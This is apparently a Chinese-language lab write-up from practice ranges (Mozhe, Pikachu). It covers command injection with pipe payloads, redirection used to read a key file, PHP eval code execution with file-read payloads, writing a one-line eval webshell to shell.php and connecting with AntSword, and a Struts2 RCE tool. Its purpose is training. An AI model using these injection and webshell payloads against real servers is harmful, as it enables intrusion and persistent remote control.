命令执行漏洞

墨者靶场案例

  • 案例命令注入执行分析https://www.mozhe.cn/bug/detail/12
    image.png
    image.png
  • 进入网站,先查看网站的系统,因为不同系统的命令不相同
  • 查看到是Ubuntu,即Linux
    image.png
  • 输入127.0.0.1| pwd不行,可能是过滤了,每个都去试试
    image.png
  • 抓包进行分析,发现可以输入了
    image.png
  • 输入127.0.0.1|ls成功发现key文件
    image.png
  • cat发现并不能查看
  • 其他查看文件的命令:less、head、tail、more
  • 都试试,发现都不行,都是一片空白
  • 然后在网上找到方法,使用输入重定向(最后面有补充)
    1
    cat < key_268422068410077.php
    image.png
  • 这样key就获取到了

代码执行漏洞

Pikachu靶场案例

  • exec “evel”
  • 这个函数就是将输入框的语句当成php执行
  • 输入phpinfo();
    image.png
  • 通过burpsuite抓包,进行后续修改
  • 更多的常用方法
    1
    2
    3
    4
    5
    6
    7
    ?txt=@eval($_POST['cmd']);   一句话木马
    ?txt=print(__LINE__); 显示文件中的当前行号
    ?txt=print(__FILE__); 获取当前绝对路径
    ?txt=print(__DIR__); 显示文件所在的目录。如果用在被包括文件中,则返回被包括的文件所在的目录
    ?txt=var_dump(file_get_contents('c:\\windows\system32\drivers\etc\hosts')); 读取文件
    ?txt=var_dump(file_put_contents($_POST[1],$POST[2]));
    1=shell.php&2=<?php phpinfo()?> 写shell
  • 获取当前的绝对路径
    image.png
  • 读取其他文件
    image.png
  • 一句话木马
  • 利用语句创建一个php文件,并在里面写入一句话木马
    1
    fputs(fopen('shell.php','w'),'<?php @eval($_POST[fin]);?>');
    image.png
  • 通过中国蚁剑就能查看文件了
    image.png

墨者靶场案例

  • Apache Struts2远程代码执行漏洞(S2-015)复现https://www.mozhe.cn/bug/detail/253
    image.png
  • 这里我们用工具可以很快解决
  • 百度网盘:struts2漏洞检测工具提取码:t95s
  • 将url输入进去,点击验证漏洞
    image.png
  • 在下面框中会显示存在的漏洞
    image.png
  • 选择存在的漏洞编号,我选择了S2-046
    image.png
  • 在命令行当中就能进行输入了
    image.png
  • key就获取到了

知识补充

输入重定向